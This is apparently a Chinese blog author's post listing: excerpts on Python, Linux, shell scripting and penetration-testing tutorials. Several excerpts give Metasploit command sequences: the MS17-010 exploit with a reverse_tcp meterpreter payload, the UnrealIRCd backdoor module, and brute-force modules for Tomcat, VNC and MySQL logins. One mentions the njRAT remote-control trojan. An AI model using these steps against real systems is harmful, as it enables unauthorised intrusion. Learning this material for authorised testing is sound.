自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

朝阳似锦 晖映山河

一个程序的生长史

  • 博客(83)
  • 收藏
  • 关注

原创 黑客攻防之告别脚本小子-----精简实用渗透测试python小白入门

title: python入门文章目录title: python入门一、变量二、输出三、字符串处理的常用方法四、列表五、元组、字典和迭代六、if选择七、异常try/except语句八、函数九、For循环十、文件十一、导入模块十二、sys模块十三、os模块十四、多线程十六、Optparse模块一、变量Python中的变量不需要声明,可以直接通过赋值来创建变量,变量赋值通过“=”实现变量赋值时应该注意数据类型。可以同时为多个变量赋值,但变量与数值的个数必须相等们之间用逗号隔开。变量名尽量具有现实.

2021-07-27 03:22:55 1186 3

原创 web安全---信息收集

文章目录常见网站架构的类型文件和目录的扫描子域名收集whois信息/ip反查/邮箱反查/资产相关/域名查询ip端口服务nmap御剑端口扫描python扫描工具web信息探测cms识别网站和常见端口的信息刺探邮箱信息收集    web安全对于渗透提前的信息收集是很重要的。可以通过各种手段获取网站的各种信息。    例如:站长个人信息、域名相关信息(域名注册邮箱、dns信息、子域名)常见网站架构的类型php+mysql+

2021-06-20 17:52:52 534

原创 渗透必学html基础

title: HTML文章目录title: HTML一、基础1、简单的HTML页面架构2、HTML常见标签metalinkscript注释P标题标签brhr文本属性pre3、form表单和input标签form表单inputa标签、img标签、table标签aimg与areatable基础单选框、复选框,下拉选框、文本域下拉选框文本域 textarea本章综合示例列表无序列表有序列表补充frameset属性scrolling一、基础1、简单的HTML页面架构<!DOCTYPE html&gt.

2021-06-05 23:22:42 475

原创 详解黑客的攻击方式1---网络欺骗攻击

黑客的攻击方式1、网络欺骗攻击1.1、五种常见的网络欺骗方式1.2、网络钓鱼攻击概念1.3、网络钓鱼攻击的常用手段1.4、网络钓鱼攻击的预防1、网络欺骗攻击    网络信息安全是21世纪各国面临的重大挑战之一。我国面对这一挑战,已经做出了一些相应的研究和开发,例如:产品的加密解密、认证与访问控制、入侵检测与响应、安全分析与模拟、灾难恢复等。近年来,在实际的与入侵者周旋中网络欺骗作为一种有效的信息安全技术出现了1.1、五种常见的网络欺骗方式 &nbsp

2021-03-19 23:09:25 8843 12

原创 计算机网络基础详细总结

计算机网络学习的核心内容就是网络协议的学习。网络协议是为计算机网络中进行数据交换而建立的规则、标准或者说是约定的集合。因为不同用户的数据终端可能采取的字符集是不同的,两者需要进行通信,必须要在一定的标准上进行。一个很形象地比喻就是我们的语言,我们大天朝地广人多,地方性语言也非常丰富,而且方言之间差距巨大。A地区的方言可能B地区的人根本无法接受,所以我们要为全国人名进行沟通建立一个语言标准,这就是我们的普通话的作用。同样,放眼全球,我们与外国友人沟通的标准语言是英语,所以我们才要苦逼的学习英语。  计算机网

2021-03-18 13:00:03 174

原创 红方实战手册

文章目录声明分享初衷丑话说在前面说明日常流程简要说明0x01 入口权限获取 [ 前期侦察,搜集阶段本身就不存在太多可防御的点,非防御重心 ]0x02 入口权限获取 [ 外部防御重心 ( "重中之重" ) ]0x03 入口权限获取 [ 专门针对各类基础服务端口的各种getshell利用,防御重点 ( "重中之重" ) ]0x04 入口权限获取传统钓鱼攻击利用,实际护网场景中用的非常频繁,细节非常多,此处不一一列举,防御重点0x05 主机安全 [ 提权利用,防御重点 ]0x06 内网安全 [ 敏感信息搜集,防御

2021-03-15 16:18:36 1053 2

原创 metasploit实操交流

文章目录端口扫描:SMB扫描_获取系统信息服务识别(ssh)密码嗅探SNMP扫描与枚举SMB登陆验证VNC身份验证远程代码执行MJDJ文件解析远程代码执行口令安全hash值传递渗透(相关内容戳我)多种后门的生成内网渗透(获得shell前提下)反反病毒(免杀)特殊的xss(键盘记录)维持访问(访问后门)如有疑惑可以私信交流启动msfconsole更新./msfupdate退回上一级quit端口扫描:调用Nmap扫描:可以参照一篇详细的文章戳我基础扫描:nmap -v -sV 加上要扫描的i

2021-03-15 15:00:11 429

原创 攻防-域名信息、子域名收集、web站点信息收集、端口信息收集、敏感信息收集的方法、实践

文章目录一、域名信息收集域名介绍whois介绍whois查询备案信息查询二、子域名信息收集子域名介绍挖掘子域名的重要性子域名挖掘工具三、web站点信息收集CMS指纹识别四、端口信息收集端口介绍端口信息收集端口攻击防御措施五、敏感信息收集敏感信息收集的重要性Google Hack语法HTTP响应收集Server信息Github信息泄露一、域名信息收集域名介绍域名(Domain Name),是由一串用点分割的名字组成的internet上某一台计算机或计算机组的名称,用于计算机数据传输时标识计算机的电子方

2020-10-06 01:10:34 1254

原创 web渗透--权限维持

远程控制生成与上传metasploitmsfcoslesearch ms17-010use exploit/windows/smb/ms170_010_eternablueshow options设置rhostsshow payloadsset payload windows/x64/meterpreter/reverse_tcp 设置反弹shellshow optionsset lhost kali-IPexploit/run远程控制使用njRAT

2020-09-29 19:32:53 157

原创 web渗透--提权辅助工具Windows-Exploit-Suggester

辅助工具介绍辅助工具Windows-Exploit-Suggester此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标潜在的缺失补丁。必须在python2环境中运行python2 -m pip install xlrdpython2 windows-exploit-suggester.py --update 得到2020-09-23-mssb.xls文件python2 windows-exploit-suggester.py -husage: windows-expl

2020-09-23 18:50:34 435

原创 web渗透--提权基础

提权的本质提权本质就是提升自己在服务器中的权限,获得更大的权限提权分类本地提权远程提权系统提权第三方软件提权权限配置一般情况下,web服务会给与一个特定低权限用户维护服务,避免给与过高权限。net user username password /addWindows系统提权基础命令获取IP地址信息IP地址是计算机在网络中的门牌号,用来寻找计算机的地址。同一台计算机有多个IP地址,可以有外部连接的IP地址,内部IP地址。在提权过程中,如果外网IP地址,可以直接使用33

2020-09-23 03:16:17 452

原创 web渗透--tomcat管理密码破解

tomcat介绍tomcat服务器是一个免费的开放源码的web应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合普遍使用,是开发和调试JSP程序的首选。默认8180端口是tomcat管理的HTTP端口探测目标tomcatnmap -sV 目标IP地址 -p 8180探测tomcat的版本信息msf破解tomcat密码msfconsoleuse auxiliary/scanner/http/tomcat_mgr_loginset rhost、 rportr

2020-09-13 03:04:27 716

原创 web渗透--irc后门利用

irc介绍IRC是Internet Relay Chat的英文缩写,中文称为互联网中继聊天,是一种网络聊天协议。端口号默认的是6667号端口探测ircnmap -sV 目标IP地址 -p 端口号msf利用irc后门使用searchsploit查看可以利用的POCmsfconsoleuse exploit/unix/irc/unreal_ircd_3281_backdoorshow optionsset rhosts 目标IP地址runsessions -lsessions

2020-09-13 03:03:55 709

原创 web渗透--vnc密码破解

vnc介绍VNC(Virtual Network Console)是虚拟网络控制台的缩写。他是一款优秀的远程控制工具软件。可视化控制,类似于远程桌面。默认vnc服务端运行在5900端口。探测目标vncnmap -sV 目标IP地址 -p 5900获取vnc版本信息vnc破解在msf下vnc_login模块可用来对vnc服务端认证用户名和密码进行破解。msfconsoleuse auxiliary/scanner/vnc/vnc_loginshow optionetssset设

2020-09-12 01:44:56 1559

原创 web渗透--postgresql密码破解,简单漏洞利用

postgresql介绍postgresql是对象基础型数据库管理系统,支持大部分SQL标准并且提供了许多其他的现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL可以用许多方法扩展,比如,通过增加新的数据类型、函数、操作符、聚集函数、索引。一般使用的是5432端口号。https://www.postgresql.org/探测postgresqlkeyinmap -sV 目标IP地址 -p 5432探测目标postgresql版本信息。msf下post

2020-09-12 01:44:25 1116

原创 web渗透--mysql弱口令破解

mysql介绍是一种关系数据库管理系统,关系数据库将数据保存在不同的表中。而不是将数据放在一个大仓库内,这样就提高了速度和灵活性。默认端口是3306www.mysql.com探测目标mysqlnmap -sV 目标IP地址 -p 端口探测mysql的版本信息msf破解mysql密码使用msf下的mysql_login模块破解mysql登录用户名和密码msfconsoleuse auxiliary/scanner/mysql/mysql_login设置目标IP地址 端口 用户名/

2020-09-10 17:16:34 486

原创 web渗透--nfs获取目标的密码文件

nfs介绍NFS(Network File System网络文件系统),是FreeBSD支持的文件系统的一种,允许网络中的计算机之间通过TCP/IP网络共享。在NFS应用中,本地的NFS的客户端可以透明地读写位于远端NFS服务器上的文件,就像浏览本地文件一样。nmap -sV 目标IP 查看是否打开了nfs一般nfs是2049号 端口探测nfsnmap --script=nfs-* 目标IP地址#探测nfs是否可以导出apt install nfs-common使用sho

2020-09-10 16:25:30 218

原创 web渗透--proftpd测试

proftpd介绍ProFTPD:是一个Unix平台或类Unix平台上的FTP服务器程序。http://www.proftpd.org探测目标proftpdnmap -sV 目标IP地址 -p 2121探测出目标的proftpd版本信息exploit-db搜索目标漏洞在https://www.exploit-db.com/ 输入对应软件及版本信息搜索是否有漏洞searchsploit 软件及版本号暴力破解使用metasploitmsfcosoleuse auxiliar

2020-09-10 16:24:55 314

原创 web渗透--反序列化远程漏洞利用

java rmi介绍JAVA RMI指的是远程方法调用(Remote Method Lovncation),是一种机制,可以让一个JAVA虚拟机上的对象去调用另外一个JAVA虚拟机上的对象的一种方法。RMI是J2SE的一部分,能够让程序员开发出基于Java的分布式应用,一个RMI对象是一个JAVA远程对象,可以从另一个JAVA虚拟机(或跨越网络)调用他的方法,可以像调用本地的JAVA对象一样调用远程JAVA对象。使分布在不同的JVM中的对象外表和行为都像本地对象一样,对于任何一个以对象为参数的RMI接口

2020-09-10 14:54:35 310

原创 web渗透--rlogin最高权限登

rlogin介绍远程登录(rhost)是一个UNIX的命令,它允许授权用户进入到网络中其他的UNIX机器,就像在现场操作一样。一旦进入主机,可以操作主机允许的任何事情。login、exec是标配。nmap 目标IP 查看端口号探测目标rlogin使用 nmap -sV 目标IP -p 端口号 探测目标rlogin版本信息exec对远程执行的进程进行验证login反弹bash shellrlogin最高权限登录rlogin -l root 目标IP地址

2020-09-10 14:54:00 456

原创 web渗透--samba RCE远程命令执行漏洞利用及修复

samba介绍samba是在linux与UNIX系统上实现SMB协议(文件共享协议,Server Messages Block,信息服务块)的一个免费软件。由服务端和客户端(C/S)程序构成。SMB是在局域网共享文件和打印机的一种通讯协议,他主要为局域网内的不同计算机之间提供文件、打印机等资源的共享服务,一般运行在139、445端口上。探测目标samba使用nmap -sV IP地址 -p 端口号 探测目标端口服务版本信息。metasploit漏洞利用使用metasploit集成的

2020-09-09 15:27:53 657

原创 web渗透--rpcbind利用

rpcbind介绍rpcbind是NFS(网络文件共享协议)中进行消息通知的服务,一般是111端口,并且NFS配置开启rpcbind_enable=“YES”探测目标rpcbindnmap -sV IP地址 -p 端口eg:nmap -sV 192.168.207.133 -p 111searchsplioit rpcbind //查看是否有可利用的脚本nmap脚本探测nmap使用nmap -p 端口号 --script=rpcinfo 目标IP地址 来探测目标IP地址的rpci

2020-09-09 14:40:28 7557 1

原创 web渗透--smtp暴力破解

1、smtp版本信息获取 1)、metasploit下smtp_version 2、medusa工具介绍 1)、-u/U 用户名/用户名文件 2)、-p/P 密码/密码文件 3)、-h/H IP地址/IP地址文件 4)、medusa -d 查看有什么模块 3、smtp验证方式 PLAIN、LOGIN、GSSAPI、DIGEST-MD5、MD5、...

2020-09-09 00:06:09 1689

原创 web渗透--枚举smtp用户名

1、telnet测试用户名 1)、telnet IP地址 端口 2)、vrfy 用户名@mail地址 2、metasploit测试用户名 1)、在metasploit中有smtp-enum可以对smtp上用户名进行枚举。 2)、use auxiliary/scanner/smtp/smtp_enum 3)、exploit/run 3)、smtp-user-enum测试用户名 ...

2020-09-09 00:05:09 1202

原创 telnet的的基本介绍,爆破,连接、提权

一、Telnel介绍 Telnet协议是TCP/IP协议族中的一员,是internet远程登录服务的标准协议和主要方式,他为使用者在本地计算机上完成远程主机工作的能力。Telnet简单实用,但因为是明文传送协议(安全性不足),所以并不被重用。一般服务器上都会禁用Telnet服务,要使用就要主动在服务端开启Telnet服务。Telnet默认使用的是23号端口。二、Telnet的版本号 1、nmap获取 1)、nmap IP地址。 2)、nmap -p...

2020-09-05 23:59:43 945

原创 C练习

1.递归和非递归分别实现求第n个斐波那契数。方法1#include #include #pragma waring (disable:4996)int factorial(int k){if(kreturn 1;elsereturn factorial(k-2)+factorial(k-1);}int main ()

2020-08-30 01:15:44 122

原创 shell-并发控制脚本,批量修改密码

ashfor i in {1…5}do{user=qq$iid $user &>/dev/nullif [ ?−ne0];thenecho"? -ne 0 ]; then echo "?−ne0];thenecho"user is exist"continueelseuseradd $userif [ $? -eq 0 ]; thenecho “123”|passwd --stdin $user &>/dev/nullif

2020-08-30 01:14:04 232

原创 shell-监控远程主机是否可以连接

until测试远程主机连接#!/usr/bin/bash# #v1.0 by kuibbaobaoip=192.168.133.75until ping -c1 -W1 $ip &>/dev/null //测试条件为假时循环do sleep 1doneecho "&ip is up"for while until比较for脚本#!/usr/bin/bashfor i in {2..54}do { ip=192.168.122.$i

2020-08-30 01:09:09 239

原创 shell-expect实现scp非交互传输文件,实现批量主机公钥推送

Expect实现scp非交互传输件expect-01#!/usr/bin/expectspawn ssh 125.124.15.132expect { "yes/no" { send "yes\r";exp_continue } "password" {send "password"}}# interactexpect "#"send "ls\r"send "pwd\r"send "exit\r"expect eofspawn scp -r /etc [email protected]

2020-08-30 01:02:14 350

原创 shell-循环知识以及例子

循环流程控制:if#!/usr/bin/bash#################################################### install apache ## v1.0 by kuibaobao #####################################################if ping -c1 www.baid

2020-08-30 01:00:30 106

原创 shell-普通数组,关联数组

List item数组Sort (分类)普通数组 (ordinary array)定义数组 (define array)方法一:一次赋一个值数字名[下标]=变量值array[0]=peararray[1]=peach方法二:一次赋值多个值array=(tom jack alxe)array= (cat /etc/passwad) //分隔符控制array=($blue $red)array=(1 2 3 4 5 ..

2020-08-30 00:58:13 201 1

原创 shell-条件测试

shell符号() 子shell中运行(()) 数值比较,运算 C语言风格$() 命令替换$(()) 整数运算{} 集合${} 变量的引用[] 条件测试[[]] 条件测试,支持正则 =~$[] 整数运算条件测试方式一:test条件表达式方式二:[条件表达式]方式三:[[条件表达式]]#!/usr/bin/bashback_dir=/var/home#if ! test -d $back_dir;

2020-08-30 00:57:27 123

原创 shell-变量内容的增删改替

变量内容的删除没有删除变量只是取出变量的部分url=www.sina.com.cnecho ${url#www.} //变量url删除www.echo ${url#www.si} //变量url删除www.siecho ${url#*si} //变量url删除到siecho ${url#*.} //删除到第一个点echo ${url##*.} //删除到最后一个点(也叫做贪婪匹配)echo ${url%m.cn} //从后往前删m.cn

2020-08-30 00:56:45 186

原创 shell-整数、小数、变量运算

shell可以用 bash -vx **.sh进行调试变量的赋值1、显示赋值变量名=变量值ip1=192.168.1.251school=“BeiJing 1000phone”today1=date +%Ftoday2=$(date+%F)2、read从键盘读入变量值read 变量名read -p “提示信息” 变量名read -t 5 -p “提示信息” 变量名 //5秒内输入read -n 2 变量名 //只要前两个字符eg:#!/usr/

2020-08-30 00:55:44 1276

原创 shell-自定义变量、环境变量、位置变量、预定义变量的运用

shell变量#!/usr/bin/baship=125.124.15.132ping -c1 $ip &>/dev/nullif [ $? -eq 0 ]; then echo "$ip is up."else echo "$ip is down."firead 从键盘读入#!/usr/bin/bashread -p "Please input a ip: " ipping -c1 ${ip} &>/dev/nullif [ $? -eq

2020-08-29 11:14:01 186

原创 shell-介绍杂论

shellping -c1 www.baidu.com && echo “成功” || echo “失败”ping -c1 www.baidu.com &>/dev/null && echo “成功” || echo “失败”步骤编写***.sh文件bash ***.sh 或 sh ***.shping -c1 www.baidu.com && echo “成功” || echo “失败”chmod +x .sh //给.s

2020-08-29 11:11:15 158

原创 linux-系统级、用户级计划任务

周期性任务循环调度执行cron用户级systemctl status croncron进程每分钟会处理一次计划任务存储位置ls /var/spool/cron/用户级的计划任务管理方式crontab -l //列出当前的计划任务crontab -r //删除当前用户的所有计划任务crontab -e //编辑管理员可以使用-u username,去管理其他用户的计划任务/etc/cron.deny 在此文件一行写一个用户名,被

2020-08-29 11:09:58 274

原创 linux-管理,处理日志进程

日志管理日志管理基础rsyslog 日志管理logrotate 日志轮转采集-------->分析一、处理日志进程rsyslogd: 绝大部分日志记录,和系统操作有关,安全,认证sshd,速、计划任务at,cron…日志可以存放在本地日志可以存放在远程服务器二、常见的日志文件(系统、进程、应用程序)tail /var/log/messages //系统主日志文件tail -20 /var/log/messagestail -f /var/log/m

2020-08-29 11:09:27 176

原创 linux-一次性调度执行at、循环调度执行cron

计划任务Schedule one-time tasks with at. 一次性调度执行atSchedule recurring jobs with cron.循环调度执行cronSchedule recurring systrm jobs.所有计划任务执行中的输出都会以邮件的方式发送给指定的用户,除非是重定向一次调度执行atapt-get install atsystemctl start stdsystemctl enable std语法格式:atnow +5mint

2020-08-29 11:08:57 709

原创 linux-文件杂论

文件查找grep: 文件内容过滤find:文件查找,针对文件名命令文件which vimwhich lsPATH //aag环境变量echo $PATH/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin任意文件locateupdatedblocate 文件名findfind [options][path…][expressiion][action]按文件名查找find / -

2020-08-29 11:08:25 130

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除